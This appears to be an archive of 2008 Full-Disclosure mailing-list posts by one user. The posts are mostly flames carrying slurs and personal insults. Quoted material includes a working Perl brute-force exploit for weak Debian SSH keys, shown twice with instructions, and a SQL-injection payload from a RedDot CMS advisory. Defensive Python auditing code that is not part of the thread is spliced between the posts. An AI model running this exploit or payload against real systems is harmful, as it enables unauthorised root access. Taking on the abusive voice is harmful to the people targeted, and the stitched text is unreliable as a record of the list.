Re: [Full-disclosure] next generation sniffer

2008-06-05 Thread reepex
so you combined wireshark and ettercap. nice job.

On Wed, Jun 4, 2008 at 11:22 PM, inter inter [EMAIL PROTECTED]
wrote:

 [0x4553-Intercepter] offers the following features:

   + Sniffing passwords\hashes of the types:

  
 ICQ\IRC\AIM\FTP\IMAP\POP3\SMTP\LDAP\BNC\SOCKS\HTTP\WWW\NNTP\CVS\TELNET\MRA\DC++\VNC\MYSQL\ORACLE
   + Sniffing chat messages of ICQ\AIM\JABBER\YAHOO\MSN\GADU-GADU\IRC\MRA
   + Promiscuous-mode scanning + ARP scanning + DHCP discovering
   + Changing MAC address of LAN adapters
   + Raw mode (with filtering rules)
   + eXtreme mode
   + Capturing packets and post-capture (offline) analyzing
   + Remote traffic capturing via RPCAP daemon
   + Built-in arp poison module
   + Reconstruction of SMTP\POP3 messages

 Works on Windows NT(2K\XP\2k3\Vista).

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] An account of the Estonian Internet War

2008-05-20 Thread reepex
On Tue, May 20, 2008 at 9:27 AM, Gadi Evron [EMAIL PROTECTED] wrote:

 http://www.ciaonet.org/journals/gjia/v9i1/699.pdf
 It is not technical, I hope you find it useful.

 Gadi Evron.


Have you ever posted anything technical? Are you capable of doing anything
useful?

Hope you the best in prepping your latest defcon talk about configuring
bind.

Re: [Full-disclosure] Working exploit for Debian generated SSH Keys

2008-05-18 Thread reepex
why don't you code it yourself instead of being a script kiddie faggot. and
don't use ;-) to look cool when you beg for warez.

On Sun, May 18, 2008 at 10:13 AM, bob harley [EMAIL PROTECTED] wrote:

 Anyone have a copy of rsa.2048.tar.bzip2
 (http://www.deadbeef.de/rsa.2048.tar.bzip2)?
 The web server isn't playing nicely  ;-)


 On Thu, May 15, 2008 at 2:35 AM, Markus Müller [EMAIL PROTECTED] wrote:

 Hi full-disclosure,

 the debian openssl issue leads that there are only 65.536 possible ssh
 keys generated, cause the only entropy is the pid of the process
 generating the key.

 This leads to that the following perl script can be used with the
 precalculated ssh keys to brute force the ssh login. It works if such a
 keys is installed on a non-patched debian or any other system manual
 configured to.

 On an unpatched system, which doesn't need to be debian, do the following:

 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2

 2. Extract it to a directory

 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
 Bits, generated on an unpatched debian (this is the key this exploit will
 break)

 4. Run the perl script and give it the location to where you extracted
 the bzip2 mentioned.

 #!/usr/bin/perl
 my $keysPerConnect = 6;
 unless ($ARGV[1]) {
   print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
   print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
   print "By [EMAIL PROTECTED]";
   exit 0;
 }
 chdir($ARGV[0]);
 opendir(A, $ARGV[0]) || die("opendir");
 while ($_ = readdir(A)) {
   chomp;
   next unless m,^\d+$,;
   push(@a, $_);
   if (scalar(@a) > $keysPerConnect) {
     system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]);
     @a = ();
   }
 }

 5. Enjoy the shell after some minutes (less than 20 minutes)

 Regards,
 Markus Mueller
 [EMAIL PROTECTED]


Re: [Full-disclosure] Working exploit for Debian generated SSH Keys

2008-05-18 Thread reepex
Could you never write perl again please? Perl underground should take a shot
at your stuff but you are not worth it.

On Thu, May 15, 2008 at 1:35 AM, Markus Müller [EMAIL PROTECTED] wrote:

 Hi full-disclosure,

 the debian openssl issue leads that there are only 65.536 possible ssh
 keys generated, cause the only entropy is the pid of the process
 generating the key.

 This leads to that the following perl script can be used with the
 precalculated ssh keys to brute force the ssh login. It works if such a
 keys is installed on a non-patched debian or any other system manual
 configured to.

 On an unpatched system, which doesn't need to be debian, do the following:

 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2

 2. Extract it to a directory

 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
 Bits, generated on an unpatched debian (this is the key this exploit will
 break)

 4. Run the perl script and give it the location to where you extracted
 the bzip2 mentioned.

 #!/usr/bin/perl
 my $keysPerConnect = 6;
 unless ($ARGV[1]) {
   print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
   print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
   print "By [EMAIL PROTECTED]";
   exit 0;
 }
 chdir($ARGV[0]);
 opendir(A, $ARGV[0]) || die("opendir");
 while ($_ = readdir(A)) {
   chomp;
   next unless m,^\d+$,;
   push(@a, $_);
   if (scalar(@a) > $keysPerConnect) {
     system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]);
     @a = ();
   }
 }

 5. Enjoy the shell after some minutes (less than 20 minutes)

 Regards,
 Markus Mueller
 [EMAIL PROTECTED]

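The defensive counterpart to the post quoted above, as an added example (not code from the thread or from Debian or OpenSSH): because the affected key space is small enough to enumerate, every entry in an authorized_keys file can be fingerprinted and compared with a list of known-weak fingerprints. The key lines, the moduli and the blocklist below are constructed for the demonstration; a real audit would load fingerprints from a published weak-key list.

```python
import base64
import hashlib
import re
import struct

# Key type followed by its base64 blob; authorized_keys options may precede it.
KEY_RE = re.compile(r"(?:^|\s)(ssh-rsa|ssh-dss)\s+([A-Za-z0-9+/]+={0,2})")


def read_fields(blob):
    """Split an SSH public-key blob into its length-prefixed fields."""
    fields, off = [], 0
    while off < len(blob):
        if off + 4 > len(blob):
            raise ValueError("truncated length prefix")
        (size,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        if off + size > len(blob):
            raise ValueError("truncated field")
        fields.append(blob[off:off + size])
        off += size
    return fields


def md5_fingerprint(blob):
    """Colon-separated MD5 fingerprint of the raw key blob."""
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def audit_authorized_keys(text, weak_fingerprints):
    """Return one finding per key line: line number, type, bits, fingerprint, status."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        match = KEY_RE.search(line)
        if match is None:
            findings.append({"line": lineno, "status": "unparsed"})
            continue
        try:
            blob = base64.b64decode(match.group(2), validate=True)
            fields = read_fields(blob)
            # The type inside the blob must agree with the type named on the line.
            if not fields or fields[0].decode("ascii") != match.group(1):
                raise ValueError("key type mismatch")
        except ValueError:
            findings.append({"line": lineno, "status": "unparsed"})
            continue
        bits = None
        if match.group(1) == "ssh-rsa" and len(fields) == 3:
            bits = int.from_bytes(fields[2], "big").bit_length()  # fields: type, e, n
        fingerprint = md5_fingerprint(blob)
        findings.append({
            "line": lineno,
            "type": match.group(1),
            "bits": bits,
            "fingerprint": fingerprint,
            "status": "WEAK" if fingerprint in weak_fingerprints else "ok",
        })
    return findings


def _mpint(value):
    """Encode a positive integer as an SSH mpint body (leading zero if high bit set)."""
    return value.to_bytes((value.bit_length() + 8) // 8, "big")


def build_sample_line(modulus, comment, options=""):
    """Constructed authorized_keys line; the modulus is a placeholder, not a real key."""
    parts = (b"ssh-rsa", _mpint(65537), _mpint(modulus))
    blob = b"".join(struct.pack(">I", len(p)) + p for p in parts)
    prefix = options + " " if options else ""
    line = prefix + "ssh-rsa " + base64.b64encode(blob).decode("ascii") + " " + comment
    return line, blob


# Constructed sample data: two syntactically valid 2048-bit entries and one broken line.
LINE_OLD, BLOB_OLD = build_sample_line((1 << 2047) | 0x1234567, "root@oldbox")
LINE_NEW, BLOB_NEW = build_sample_line(
    (1 << 2047) | 0x7654321, "deploy@newbox", 'command="/usr/bin/true",no-pty')
SAMPLE = "\n".join([
    "# constructed authorized_keys file",
    LINE_OLD,
    LINE_NEW,
    "ssh-rsa AAAAB3NzaC1yc2E broken@host",
])
# Constructed blocklist: pretend the first key's fingerprint is on the weak list.
WEAK = {md5_fingerprint(BLOB_OLD)}

if __name__ == "__main__":
    for finding in audit_authorized_keys(SAMPLE, WEAK):
        print(finding)
```

Entries reported as "unparsed" deserve a manual look rather than being treated as safe.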

[Full-disclosure] SECNAP IS CRAP

2008-05-13 Thread reepex
why are companies like this allowed to exist? Their employee ( Bob McGuire,
Director ) openly admits ( see previous emails with Robert, DonB, and me )
that his company participates in FUD and scare tactics.  They have no
apparent talent and use 'vulnerability scanners' and 'security tools' and
divert our conversation from their POS business to how to help protect
against spam.

Secnap should be blacklisted and its employees should be ridiculed on sight.

[Full-disclosure] fear mongering and utter BS from secnap

2008-05-10 Thread reepex
Where is secreview when you actually need them? After the useless thread
about gmail blah blah I decided to check out http://www.secnap.com/ and all
I can say is WHAT THE FUCK.

The first lines of their website:
The Internet comes with built in threats from hackers, industrial
Espionage, spyware and employee abuse.

Sounds like some homeland security brochure

Followed shortly by:
Our Managed IPS solution includes our patent pending HackerTrap™ IPS that
will block external attacks as well as protect your company from employee
abuse and loss of confidential information. 

I would love to see some proof of them stopping confidential information
from being gathered over an internal network, but based on their site I am
sure this is more BS anyway.

Then I browse to:
http://www.secnap.com/services.php?pg=3

Are you aware that there are an estimated 100,000 hackers on the Internet
today, actively scanning government and corporate networks, looking for
vulnerabilities they can exploit to gain access to critical corporate
information?

Speaks for itself

If you follow the link on this page you find a pdf here:
http://www.secnap.com/pdfs/pentest.pdf

Where it details how they will run public vulnerability scanners and compare
your banners to known vulnerable services. Who are the script kiddies here
again?

This company is trash and their members should not be allowed to post on
this list. They are Homeland Security/George Bush type fear mongering
retards trying to make a buck and scare people into their nonsense.

Looking at their site they are another group of paid script kiddies in
business suits.
You better hope that one of 100,000 internet hackers don't have any
exploits that aren't covered by nessus or secnap will not be able to protect
you anymore.

Re: [Full-disclosure] fear mongering and utter BS from secnap

2008-05-10 Thread reepex
so because I use a gmail account it means everything I said is invalid? Why
not answer some questions about your practices since it seems your company
is a bunch of script kiddies for hire & masters of scaring people into
buying services

Also where did the 100,000 hackers figure come from? Did you make this up
also?

On Sat, May 10, 2008 at 9:18 PM, Robert McGuire [EMAIL PROTECTED] wrote:

 I'll take you seriously when you come out from behind your gmail mask.

 Bob McGuire
 Director, Channel Sales East
 | SECNAP Network Security
 Direct Line 404.446.1961
 1-877-NOSPAM4U (877-667-7264) ext.1961
 http://www.spammertrap.com/

 SpammerTrap – Everything Channel Hot Product of 2008
 SECNAP Voted Hot Company of 2008 at Technosium Summit
 www.technosium.com/hotcompanies/



 -Original Message-
 From: reepex [mailto:[EMAIL PROTECTED]
 Sent: Sat 5/10/2008 3:13 PM
 To: Michael Scheidell; full-disclosure@lists.grok.org.uk;
 [EMAIL PROTECTED]; [EMAIL PROTECTED]; Kevin Barnabe;
 Robert McGuire; Jennifer Hamilton
 Subject: fear mongering and utter BS from secnap

 Where is secreview when you actually need them? After the useless thread
 about gmail blah blah I decided to check out http://www.secnap.com/ and
 all
 I can say is WHAT THE FUCK.

 The first lines of their website:
 The Internet comes with built in threats from hackers, industrial
 Espionage, spyware and employee abuse.

 Sounds like some homeland security brochure

 Followed shortly by:
 Our Managed IPS solution includes our patent pending HackerTrap™ IPS that
 will block external attacks as well as protect your company from employee
 abuse and loss of confidential information. 

 I would love to see some proof of them stopping confidential information
 from being gathered over an internal network, but based on their site I am
 sure this is more BS anyway.

 Then I browse to:
 http://www.secnap.com/services.php?pg=3

 Are you aware that there are an estimated 100,000 hackers on the Internet
 today, actively scanning government and corporate networks, looking for
 vulnerabilities they can exploit to gain access to critical corporate
 information?

 Speaks for itself

 If you follow the link on this page you find a pdf here:
 http://www.secnap.com/pdfs/pentest.pdf

 Where it details how they will run public vulnerability scanners and
 compare
 your banners to known vulnerable services. Who are the script kiddies here
 again?

 This company is trash and their members should not be allowed to post on
 this list. They are Homeland Security/George Bush type fear mongering
 retards trying to make a buck and scare people into their nonsense.

 Looking at their site they are another group of paid script kiddies in
 business suits.
 You better hope that one of 100,000 internet hackers don't have any
 exploits that aren't covered by nessus or secnap will not be able to
 protect
 you anymore.


Re: [Full-disclosure] fear mongering and utter BS from secnap

2008-05-10 Thread reepex
I scratched my reply to this mail because don's reply was much better

On Sat, May 10, 2008 at 10:33 PM, Robert McGuire [EMAIL PROTECTED]
wrote:

 I don't believe remaining anonymous invalidates comments, just seems
 unnecessary, much like FUD.

 Can't argue with reepex, FUD is unnecessary and utterly transparent so you
 have to wonder why every company in the industry perpetuates it.  It's
 counterproductive in fact, makes my job more difficult so were it up to me
 it wouldn't be a part of our message.

 If either of you have better insight regarding the impact, cost, effect of
 spam please share.



 Bob McGuire
 Director, Channel Sales East
 | SECNAP Network Security
 Direct Line 404.446.1961
 1-877-NOSPAM4U (877-667-7264) ext.1961
 http://www.spammertrap.com/

 SpammerTrap – Everything Channel Hot Product of 2008
 SECNAP Voted Hot Company of 2008 at Technosium Summit
 www.technosium.com/hotcompanies/



 -Original Message-
 From: don bailey [mailto:[EMAIL PROTECTED]
 Sent: Sat 5/10/2008 10:39 PM
 To: reepex
 Cc: Robert McGuire; Michael Scheidell; Kevin Barnabe; Jennifer Hamilton
 Subject: Re: [Full-disclosure] fear mongering and utter BS from secnap


 reepex wrote:
 | so because I use a gmail account it means everything I said is invalid?
 | Why not answer some questions about your practices since it seems your
 | company is a bunch of script kiddies for hire & masters of scaring
 | people into buying services
 |
 | Also where did the 100,000 hackers figure come from? Did you make this
 | up also?
 |
 | On Sat, May 10, 2008 at 9:18 PM, Robert McGuire [EMAIL PROTECTED]
 | mailto:[EMAIL PROTECTED] wrote:
 |
 | I'll take you seriously when you come out from behind your gmail
 mask.
 |
 | Bob McGuire
 | Director, Channel Sales East

 You may not want to take him seriously, but I suggest you take
 his questions seriously. People in this industry don't particularly
 appreciate FUD or bullshit facts.

 And my name really is Don Bailey so you can be assured that I'm
 not hiding behind any mask.

 D

Re: [Full-disclosure] fear mongering and utter BS from secnap

2008-05-10 Thread reepex
very well said :)

I guess bullshit and made up stats are acceptable since everyone else is
doing it.

On Sat, May 10, 2008 at 10:49 PM, don bailey [EMAIL PROTECTED] wrote:


 Robert McGuire wrote:
 | I don't believe remaining anonymous invalidates comments, just seems
 unnecessary, much like FUD.
 |
 | Can't argue with reepex, FUD is unnecessary and utterly transparent so
 you have to wonder why every company in the industry perpetuates it.
 It's counterproductive in fact, makes my job more difficult so were it
 up to me it wouldn't be a part of our message.
 |
 | If either of you have better insight regarding the impact, cost,
 effect of spam please share.
 |

 Well now that you're admitting that FUD is part of your business model
 I'm saddened that this e-mail isn't to a public mailing list. I'm sure
 many professionals would be interested in your ethics. Blaming other
 companies in the security industry is child's play and only serves
 to make you look foolish.

 I find it extremely laughable that you are attempting to redirect this
 discussion to the impact, cost, effect of spam. Our focus is your
 company's blatant use of fake facts to push your product. Do you
 really think you're talking to adolescents? I'm not distracted by
 your shiny nickel. Either stay on topic or end the conversation.

 D


Re: [Full-disclosure] Joey, joey, joey...

2008-05-10 Thread reepex
and what do you do outside of FD? apply windows updates and push norton AV
updates to clients?

On Sat, May 10, 2008 at 11:19 AM, Paul Schmehl [EMAIL PROTECTED] wrote:

 --On May 9, 2008 9:37:12 PM -0700 Professor Micheal Chatner
 [EMAIL PROTECTED] wrote:

  You probably don't even have a CISSP.
 
  -- Professor Micheal Chatner, M.D., CISSP

 That's OK.  Neither do you.  In fact, you don't even exist outside of FD.
 That's a pretty sick existence.

 Paul Schmehl ([EMAIL PROTECTED])
 Senior Information Security Analyst
 The University of Texas at Dallas
 http://www.utdallas.edu/ir/security/


Re: [Full-disclosure] ZF04 has been released!

2008-05-10 Thread reepex
Once again zf0 shows they cannot hack anyone worthwhile. cDc, robert lemos,
and anonymous? Could you have picked any bigger script kiddies?

and no one gives a fuck about your pwnie awards.

On Fri, May 9, 2008 at 7:11 PM, [EMAIL PROTECTED] wrote:

 I, Robert Lemos (see robertlemos.com, I need hits!) have
 collaborated with the ZF0 team to bring you this piece. Check out
 my blog or milw0rm or http://cypher0.h18.ru//zf04.txt for more
 information! I am talking to SecurityFocus about making it a
 featured item, so don't forget to check securityfocus.com and
 robertlemos.com for further details in the upcoming weeks!

 Thank you dearies,

 Bobby Bologna Lemos


Re: [Full-disclosure] HD Moore

2008-05-02 Thread reepex
no one cares what a CISSP has to say

On Fri, May 2, 2008 at 9:44 PM, John C. A. Bambenek, GCIH, CISSP 
[EMAIL PROTECTED] wrote:

Re: [Full-disclosure] Microsoft device helps police pluck evidence from cyberscene of crime

2008-04-29 Thread reepex
you are a retard.

it's for live memory analysis on a running machine. not anything like a
bootable Live CD.

On Tue, Apr 29, 2008 at 8:41 PM, Peter Besenbruch [EMAIL PROTECTED] wrote:

 On Tuesday 29 April 2008 14:31:18 Ivan . wrote:
 
 http://seattletimes.nwsource.com/html/microsoft/2004379751_msftlaw29.html

 It looks like the Microsoft version of a Knoppix disk.
 --
 Hawaiian Astronomical Society: http://www.hawastsoc.org
 HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky


Re: [Full-disclosure] Cirque du 0day HIJACKED!!!

2008-04-26 Thread reepex
you reply to everyone else but skip my email about your botnet? I guess that
means it's up and running well?

On Fri, Apr 25, 2008 at 6:49 PM, I)ruid [EMAIL PROTECTED] wrote:

 On Thu, 2008-04-24 at 14:40 -0700, Andrew A wrote:
  Stop lying to everyone. Caughq.org got owned and rm'd. Looks like
  Michael Chatner is a more fitting individual to run the Cirque than
  you, buddy.

 Rght... that's why when I put a new power supply in it this morning
 it booted with its filesystem intact, right? (:

 --
 I)ruid, C²ISSP
 [EMAIL PROTECTED]
 http://druid.caughq.org


Re: [Full-disclosure] Could n3td3v win a Pwnie award?

2008-04-26 Thread reepex
at least you wouldn't have to remove trojans and tracking cookies off your
customer's machines then

On Sat, Apr 26, 2008 at 11:39 PM, Micheal Cottingham 
[EMAIL PROTECTED] wrote:

 Indeed. There is no such thing as secure. Security is a process, one
 that never ends. If it did, many of us would be out of a job. ;)

 On Sun, Apr 27, 2008 at 12:01 AM, G. D. Fuego [EMAIL PROTECTED] wrote:
 
 
 
  On Sat, Apr 26, 2008 at 10:32 PM, Joey Mengele 
 [EMAIL PROTECTED]
  wrote:
   wishi,
  
   On Sat, 26 Apr 2008 12:19:46 -0400 wishi [EMAIL PROTECTED]
   wrote:
  
  
   
   I thought exactly the same. Security is a process. If someone
   doesn't
   understand, that it's better to know the vulnerabilities to
   defend, he
   didn't understand it.
   
  
   I think you have this mixed up. Security a destination, not a
   process.
  
  
 
  If that was true then the system you secure today would be safe
 untouched a
  year from now or the year after that.
 

Re: [Full-disclosure] Cirque du 0day HIJACKED!!!

2008-04-24 Thread reepex
how is the botnet linked with services.caughq.org doing? Still spamming aim
clients?

On Thu, Apr 24, 2008 at 10:29 AM, I)ruid . [EMAIL PROTECTED] wrote:

 Wow, that didn't take long...

 I released a draft of the Cirque du 0day CFP to a few closed channels a
 week or so ago, to float the idea around and see if anyone was interested in
 participating.  Apparently Michael Chatner decided to hijack the idea and
 submit it to the public himself.  Unfortunately the power supply died in my
 co-located box for caughq.org last week and so I cannot currently respond
 from my usual email address, [EMAIL PROTECTED]  Anyhow, any number of
 people can confirm that Michael Chatner's publication of the Cirque du 0day
 idea is illegitimate, including Jeff Moss whom I emailed about the idea a
 week and a half ago to get his opinion on whether or not the idea would be
 supported by the DEFCON organization and staff.  You can expect a much more
 flushed out version of this CFP after my discussions with Jeff and the
 DEFCON staff are over, assuming the idea is a go.

 I therefore must recommend that no one respond to Michael's illegitimate
 CFP for and claim to the Cirque du 0day idea, and rather shame him for being
 a huge poser. (:


Re: [Full-disclosure] IRM Security Advisory : RedDot CMS SQL injection vulnerability

2008-04-21 Thread reepex
so IRMPLC goes from xss in cisco products to sql injection in a small user
base webapp?

I think you may need to fire your current 'research' team and start over

On Mon, Apr 21, 2008 at 11:06 AM, Mark Crowther [EMAIL PROTECTED]
wrote:

  RedDot CMS SQL injection vulnerability (CVE Number: CVE-2008-1613)



 http://www.irmplc.com/index.php/167-Advisory-026





 Vulnerability Type/Importance: SQL injection/Critical



 Problem Discovered: 12 February 2008

 Vendor Contacted:   19 February 2008

 Advisory Published: 21 April 2008





 Abstract:

 The RedDot CMS Product (http://www.reddot.com) is vulnerable to a
 pre-authentication SQL injection vulnerability which, when exploited, allows
 enumeration of all SQL database content.



 Description:

 The 'LngId' Parameter passed to IoRD.asp is responsible for assigning the
 language context for the CMS application. The vulnerability exists as a
 result of inadequate validation of user-supplied input within this
 parameter.





 Technical Details:

 Normal input for the 'LngId' parameter contains a code such as ENG, DEU,
 JP, denoting the language type. This parameter is not properly validated and
 the injection of SQL statements within it allows attackers unrestricted
 access to enumerate information from the database. For example:




 https://vulnerablehost.com:443/cms/ioRD.asp?Action=ShowMessageLngId=ENG.DGC0FROM
  IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85)
 and name '' ORDER BY 1;-- DisableAutoLogin=1



 Proof of Concept:

 A Proof of Concept (RDdbenum.py) has been developed to automate
 enumeration of entire database content available from
 http://www.irmplc.com/Tools/RDdbenum.py





 Workaround / Solutions:

 There are no known workarounds for this vulnerability

 The Vendor has released a patch for this vulnerability, Release 7.5.1.86,
 available from normal Red Dot customer support contacts.





 Tested / Affected Versions:

 IRM confirmed the presence of this vulnerability in RedDot CMS version 7.5
 Build 7.5.0.48, tested with Microsoft SQL Server 2005 database.

 It is believed that this issue exists in RedDot CMS versions 6.5 and 7.0;
 however this has not been fully verified.





 Credits:

 Research and Advisory: Mark Crowther and Rodrigo Marcos





 Disclaimer:

 All information in this advisory is provided on an 'as is' basis in the
 hope that it will be useful. Information Risk Management Plc is not
 responsible for any risks or occurrences caused by the application of this
 information.





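A mitigation and detection sketch for the advisory quoted above, as an added example (not code from IRM, RedDot or the thread): since the advisory says legitimate 'LngId' values are short language codes such as ENG, DEU and JP, the value can be checked against that shape before it reaches any query, and the same rule can be run over web-server logs to find requests that did not conform. The log format, the client addresses and the 2-to-3 uppercase-letter pattern are assumptions made for the demonstration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed shape of a legitimate language code, based on the advisory's examples
# (ENG, DEU, JP). Adjust to the codes actually configured on the CMS.
LNGID_RE = re.compile(r"[A-Z]{2,3}")

# Constructed Combined-Log-style request line: client address first, request in quotes.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[0-9.]+"')


def lngid_is_valid(value):
    """True only when the whole value is a short uppercase language code."""
    return LNGID_RE.fullmatch(value) is not None


def require_lngid(value):
    """Server-side guard: return the code unchanged or refuse the request."""
    if not lngid_is_valid(value):
        raise ValueError("rejected LngId value")
    return value


def flag_lngid_requests(log_lines):
    """Return (client, decoded LngId) for ioRD.asp requests with a non-conforming LngId."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        client, target = match.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/iord.asp"):
            continue
        # parse_qsl percent-decodes values, so encoded payloads are seen in clear.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name.lower() == "lngid" and not lngid_is_valid(value):
                hits.append((client, value))
    return hits


# Constructed log lines (documentation address range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Apr/2008:11:00:01 +0000] '
    '"GET /cms/ioRD.asp?Action=ShowMessage&LngId=ENG&DisableAutoLogin=1 HTTP/1.1" 200 512',
    '192.0.2.44 - - [21/Apr/2008:11:00:07 +0000] '
    '"GET /cms/ioRD.asp?Action=ShowMessage&LngId=ENG%20UNION%20SELECT%201&DisableAutoLogin=1 '
    'HTTP/1.1" 200 9481',
    '192.0.2.45 - - [21/Apr/2008:11:00:09 +0000] '
    '"GET /cms/ioRD.asp?Action=ShowMessage&LngId= HTTP/1.1" 500 120',
    '192.0.2.46 - - [21/Apr/2008:11:00:12 +0000] '
    '"GET /cms/other.asp?LngId=not-checked-here HTTP/1.1" 200 300',
    '192.0.2.47 - - [21/Apr/2008:11:00:15 +0000] '
    '"GET /cms/ioRD.asp?Action=ShowMessage&lngid=DEU HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for client, value in flag_lngid_requests(SAMPLE_LOG):
        print(client, repr(value))
```

Parameters sent in a POST body do not appear in access logs, so the log check only covers query-string requests.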

Re: [Full-disclosure] Security issue in Filezilla 3.0.9.2: passwords are stored in plain text (sitemanager.xml)

2008-04-21 Thread reepex
Micheal Cottingham [EMAIL PROTECTED] wrote:

techie.michael .. enough said, go back to geek squad and stay off the list

Re: [Full-disclosure] Security issue in Filezilla 3.0.9.2: passwords are stored in plain text (sitemanager.xml)

2008-04-18 Thread reepex
FTP PASSWORDS ARE STORED IN PLAINTEXT?!?!?!?!

HOLY FUCK

On Fri, Apr 18, 2008 at 2:09 PM, carl hardwick [EMAIL PROTECTED]
wrote:

 A security issue in Filezilla 3.0.9.2 (and previous versions) allows
 local users to retrieve all saved passwords because they're stored in
 a plain text sitemanager.xml

 <?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
 <FileZilla3>
     <Servers>
         <Server>
             <Host>ftpspace.domain.com</Host>
             <Port>21</Port>
             <Protocol>0</Protocol>
             <Type>0</Type>
             <Logontype>1</Logontype>
             <User>[EMAIL PROTECTED]</User>
             <Pass>I'mAPlainTextPassword</Pass>

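An audit sketch for the report quoted above, as an added example (not code from FileZilla or the thread): it parses a sitemanager.xml using the element names shown in the post, lists every site entry that carries a stored password without echoing the password itself, and checks whether the file is readable by other local accounts. The sample file content, host names and user names are constructed.

```python
import os
import stat
import xml.etree.ElementTree as ET

# Constructed sample following the element names in the post.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<FileZilla3>
    <Servers>
        <Server>
            <Host>ftpspace.domain.com</Host>
            <Port>21</Port>
            <Protocol>0</Protocol>
            <Type>0</Type>
            <Logontype>1</Logontype>
            <User>user@example.com</User>
            <Pass>I'mAPlainTextPassword</Pass>
        </Server>
        <Server>
            <Host>files.example.net</Host>
            <Port>21</Port>
            <Protocol>0</Protocol>
            <Type>0</Type>
            <Logontype>2</Logontype>
            <User>backup</User>
            <Pass></Pass>
        </Server>
    </Servers>
</FileZilla3>
"""


def stored_passwords(xml_data):
    """Return one record per <Server> with a non-empty <Pass>; never the secret itself."""
    root = ET.fromstring(xml_data)
    findings = []
    for server in root.iter("Server"):
        password = server.findtext("Pass") or ""
        if not password:
            continue
        findings.append({
            "host": server.findtext("Host") or "",
            "port": server.findtext("Port") or "",
            "user": server.findtext("User") or "",
            "logontype": server.findtext("Logontype") or "",
            "pass_len": len(password),  # length only, so the report is safe to share
        })
    return findings


def readable_by_others(path):
    """True when group or world read bits are set on the file (POSIX permissions)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def audit_sitemanager(path):
    """Combine the permission check and the stored-password listing for one file."""
    with open(path, "rb") as handle:
        data = handle.read()
    return {
        "path": path,
        "readable_by_others": readable_by_others(path),
        "stored": stored_passwords(data),
    }


if __name__ == "__main__":
    for entry in stored_passwords(SAMPLE_XML):
        print(entry)
```

On Windows the permission bits reported by os.stat do not reflect ACLs, so the readable_by_others result is only meaningful on POSIX systems.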

Re: [Full-disclosure] Secunia Research: Lotus Notes Folio Flat File Parsing Buffer Overflows

2008-04-17 Thread reepex
I find it funny you are the one to complain about too many advisories when
you spam the list with sprintf and strcpy bugs you grepped for in random
applications everyday

On Tue, Apr 15, 2008 at 9:20 AM, Luigi Auriemma [EMAIL PROTECTED]
wrote:

  Autonomy Keyview Folio Flat File Parsing Buffer Overflows
  Autonomy Keyview Applix Graphics Parsing Vulnerabilities
  Autonomy Keyview EML Reader Buffer Overflows
  activePDF DocConverter Folio Flat File Parsing Buffer Overflows
  activePDF DocConverter Applix Graphics Parsing Vulnerabilities
  Lotus Notes Applix Graphics Parsing Vulnerabilities
  Lotus Notes Folio Flat File Parsing Buffer Overflows
  Lotus Notes EML Reader Buffer Overflows
  Lotus Notes kvdocve.dll Path Processing Buffer Overflow
  Lotus Notes htmsr.dll Buffer Overflows
  Symantec Mail Security Folio Flat File Parsing Buffer Overflows
  Symantec Mail Security Applix Graphics Parsing Vulnerabilities

 12 mails for the same library?

 From what I have understood all the bugs are just in this Autonomy
 Keyview library so in my opinion reporting the same identical bugs in
 each software which uses this third-party component and additionally
 without saying that the problem in reality is in the library is wrong
 and leads to a lot of confusion.

 It's just like if someone finds a bug in zlib and releases 1
 advisories, one for each program in the world which uses the library...
 the bug is not in these 1 programs but only in zlib.


 ---
 Luigi Auriemma
 http://aluigi.org


Re: [Full-disclosure] OpenID. The future of authentication on the web?

2008-03-23 Thread reepex
that's right pdp  - go run to your protected lists and blogs where you don't
have to hear anything negative and where you can flame people without
contest who talk against you.

you are another Bill O Reilly and everyone thinks of you as such. enjoy your
sheep.


On Sun, Mar 23, 2008 at 9:52 AM, Petko D. Petkov 
[EMAIL PROTECTED] wrote:

 Hi Steven,

 I guess most 1337 hax0rs will flame you on this list. There are good
 security blogs you can follow and learn from instead. Full-disclosure
 is for rants and bashing only!

 I can point you to some articles that I wrote regarding OpenID,
 however, let me share my thoughts quickly as that will save you some
 time and of course if you are still curious you can go research
 further.

 First of all, OpenID is a very simple but rather useful technology.
 With OpenID you have only one account, your ID, which you can use
 everywhere where the OpenID technology is supported. It is not clear
 whether this setup is more secure from what we have at the moment
 (every site forces you to register unique username/password pair) but
 it is definitely more convenient. The first argument for OpenID is
 that the more you share your secrets, credits card information,
 usernames, password, the higher the chances this information to be
 leaked or stolen. On the other hand, OpenID is prone to phishing
 attacks so user education is required.

 Think about OpenID as the equivalent of PayPal for authentication. In
 theory, it is more secure to pay through paypal as you are not sharing
 your credit card information with everyone else but a single provider.

 I am all for OpenID as you can spend good time on securing a single
